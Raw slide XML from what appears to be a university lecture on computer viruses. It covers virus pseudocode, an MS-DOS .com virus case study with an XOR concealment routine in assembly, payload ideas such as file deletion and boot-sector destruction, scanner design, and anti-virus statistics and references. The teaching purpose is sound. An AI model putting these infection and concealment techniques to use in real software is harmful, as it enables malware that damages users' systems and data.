            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  if (triggered()) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     doDamage(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  jump to main of infected program;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void infectExecutable() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  file = choose an uninfected executable file;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  prepend V to file; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void doDamage() { ... }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int triggered() { return (some test? 1 : 0); }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9578-7590-4BD0-818E-D10ED5089842}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>33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Case Study: MS-DOS .com Virus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Virus Code == V1; V2.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Program infected == P1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V1, the Replicator. </a:t>
            </a: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Rewrites </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>program file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>as: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V1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>; jump to V2; P1;  V2.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V2, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Concealer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>.  Copies P1 over V1.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Bomb (payload)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Infecting .EXE file is much more complicated.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42E-7158-4A09-B028-8683CB99559B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld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.com Virus: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Conceal via simple XOR encryption</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="400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>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>		</a:t>
            </a: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encrypt_val   db   ?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1600">
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              <a:ea typeface="新細明體" pitchFamily="18" charset="-12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decrypt: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encrypt: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ah, encrypt_val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1600">
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              <a:ea typeface="新細明體" pitchFamily="18" charset="-12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cx, part_to_encrypt_end - part_to_encrypt_start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si, part_to_encrypt_start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mov di, si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1600">
              <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              <a:ea typeface="新細明體" pitchFamily="18" charset="-12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xor_loop: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lodsb                 ; DS:[SI] -&gt; AL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xor al, ah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stosb                 ; AL -&gt; ES:[DI]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loop xor_loop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>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>     ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="140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752C-A29E-4226-A1A3-A1C53D4DE191}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>35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.com Virus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bombs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System slowdown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Easily handled by trapping an interrupt and causing a delay when it activates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>File deletion.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Message Display.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Killing/Replacing the partition table or boot sector of the hard drive.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1484-31DF-4F73-8B4E-7861A1C3CDAD}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>36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Linux Virus Writing HOWTO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“Abstract: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This document describes how to write parasitic file viruses infecting ELF executables on Linux/i386. Though it contains a lot of source code, no actual virus is included.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.google.com/search?hl=en&amp;q=Linux+Virus+Writing+HOWTO+&amp;btnG=Search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Viruz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, On Demand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Readily available online kits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viruz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> maker kit is detected as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Troj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/Agent-GOF.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Mateti, Viruses, Trojans and Worms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DB08-015C-4C5E-A67B-28B2F6919F8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18588"/>
            <a:ext cx="4038600" cy="309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31CF-B4E3-43EC-A029-44755D4F6002}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>38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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scanner Design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smtClean="0"/>
              <a:t>pieces of code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to a database of known malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just matching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>byte sequences in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Identify viruses by their “signatures.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Search for these patterns in executable files.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Watch for changes in files.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6BCD-5D25-4581-A331-B2F3CA4E57C2}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>39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Scanners Internals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>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1831975" y="1600200"/>
          <a:ext cx="5480050" cy="4530725"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s103427" name="Photo Editor Photo" r:id="rId3" imgW="3436918" imgH="2841905" progId="MSPhotoEd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2C86-2D68-4C59-BFA9-6F82DB221EEC}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld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Lies, damned lies and anti-virus statistics?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It is estimated that PC Viruses cost businesses approximately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$55 Billion in damages in 2003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$30 Billion in 2002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$13 Billion in 2001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hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>www.computerworld.com/securitytopics/security/story/0,10801,89138,00.html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Source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.computereconomics.com/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2001	$13.2 billion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2000	$17.1 billion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1999	$12.1 billion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 err="1"/>
              <a:t>Nimda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	$635 million,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Code Red	$2.62 billion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SirCam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	$1.15 billion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Code Red $8.7bn in damage estimated.  -- Reuters wire service. Aug 2, 2001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5FB7-BB12-4AEA-B3A7-E574CEC28638}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>40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Scanners Internals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4454" name="Picture 6" descr="Fig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Anti-malware Products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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CARO 2010 Presentation slides </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.caro2010.org/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Based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on data from about 30 products (2010)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Installer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Size: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>69.6 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on Disk: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>265.5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Number </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of Signatures: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3,666,872</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of Signatures: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>84.4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Updates </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>per Day: 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WildList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection: (virtually) 100%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Zoo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>91.59</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>%</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>False Positives</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0.00157</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>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Mateti, Viruses, Trojans and Worms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DB08-015C-4C5E-A67B-28B2F6919F8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 Scanners Today</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114701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Only have a chance to work if you update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>them, say </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>every 3 hours </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>your vendor identifies new viruses in 1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>hour</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>But...still useful to protect you from old viruses.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Active area for academic research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Avfs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>: An On-Access Anti-Virus File System”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Yevgeniy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Miretskiy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Abhijith</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> Das, Charles P. Wright, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Erez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Zadok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, Stony Brook University; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.usenix.org/event/sec04/tech/full_papers/miretskiy/miretskiy_html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> 2004</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>“Hash-AV: fast virus signature scanning by cache-resident filters”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Ozgun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Erdogan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> and Pei Cao, Stanford University, International Journal of Security and Networks   Issue:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Vol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> 2, No 1-2,  2007   pp.  50 – 59</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Limitations of Current Anti-Virus Scanning Technologies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Srinivas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Mukkamala</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Antonins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>Sulaiman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>, P Chavez, AH Sung, New Mexico Tech, USA New Mexico Tech, in the book “Advances in Enterprise Information Technology Security”, 2007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2600-1408-4E11-919B-137F7222D990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761-7E5C-465C-AEDB-A9C21080A267}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>43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Very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Afraid ...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ILoveYou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really dumb people with no resources write malicious programs, it costs $10B.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Easy to make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ILoveYou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> much more harmful:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Instead of just forwarding itself, change a few random bits in random documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Post documents with “interesting” names on a public web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>What would happen if smart people with resources wrote a malicious program?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D0F8-1A6B-4975-AAEE-FE2ED1CF51A6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a Jungle Out </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There ...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Reasonable approximation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Any program you run can do anything to your machine: erase all your files, send incriminating email to all your friends, quietly tamper with one number in a spreadsheet, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Any document you open or web page you visit is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1"/>
              <a:t>program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44B7-F554-4FDA-B606-53A5006C04C5}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>45</a:t>
            </a:fld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/>
              <a:t>Vesselin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Bontchev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, Future Trends in Virus Writing, 1994, IFIP TC-11,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t> www.commandcom.com/ virus/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>trends.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="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/>
              <a:t>Sandeep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Kumar, and Gene </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Spafford</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, "A Generic Virus Scanner in C++," Proceedings of the 8th Computer Security Applications Conference;  IEEE Press, Piscataway, NJ; pp. 210-219, 2-4 Dec 1992. [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Local copy .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>]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Antivirus Research - Scientific Papers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.research.ibm.com/antivirus/SciPapers.htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>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Anthony </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Cheuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Tung Lai, "Comprehensive Blended Malware Threat Dissection Analyze Fake Anti-Virus Software and PDF Payloads", 2010, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.sans.org/reading_room/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>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Bryan Barber, " Cheese Worm: Pros and Cons of a Friendly Worm", 2003, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.sans.org/reading_room/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4A2E-FBFF-428B-900A-6D7BF61D2D1B}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>5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9982200" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>1988:  Less than 10 known viruses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>1990:  New virus found every day</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>1993:  10-30 new viruses per week</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>1999:  45,000 viruses and variants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>Source:  McAfee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124200" y="685800"/>
          <a:ext cx="6096000" cy="4075113"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <p:oleObj spid="_x0000_s82947" name="Chart" r:id="rId3" imgW="6096000" imgH="4076700" progId="MSGraph.Chart.8">
              <p:embed followColorScheme="full"/>
            </p:oleObj>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82948" name="WordArt 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="-576263"/>
            <a:ext cx="4724400" cy="34718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4800" b="1" kern="10"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0000FF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Trebuchet MS"/>
              </a:rPr>
              <a:t>Virus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" b="1" kern="10"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0000FF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Trebuchet MS"/>
              </a:rPr>
              <a:t>Statistics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457200" y="3733800"/>
            <a:ext cx="13716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5334000" y="3429000"/>
            <a:ext cx="1066800" cy="30480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V="1">
            <a:off x="6705600" y="2133600"/>
            <a:ext cx="1066800" cy="121920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V="1">
            <a:off x="8001000" y="838200"/>
            <a:ext cx="762000" cy="106680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2209800" y="3733800"/>
            <a:ext cx="13716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3810000" y="3733800"/>
            <a:ext cx="13716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oleChartEl type="series" lvl="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2947" grpId="0" bld="series" animBg="0"/>
      <p:bldP spid="82949" grpId="0" animBg="1"/>
      <p:bldP spid="82950" grpId="0" animBg="1"/>
      <p:bldP spid="82951" grpId="0" animBg="1"/>
      <p:bldP spid="82952" grpId="0" animBg="1"/>
      <p:bldP spid="82953" grpId="0" animBg="1"/>
      <p:bldP spid="82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B624-357A-431E-8649-0854389A203C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>6</a:t>
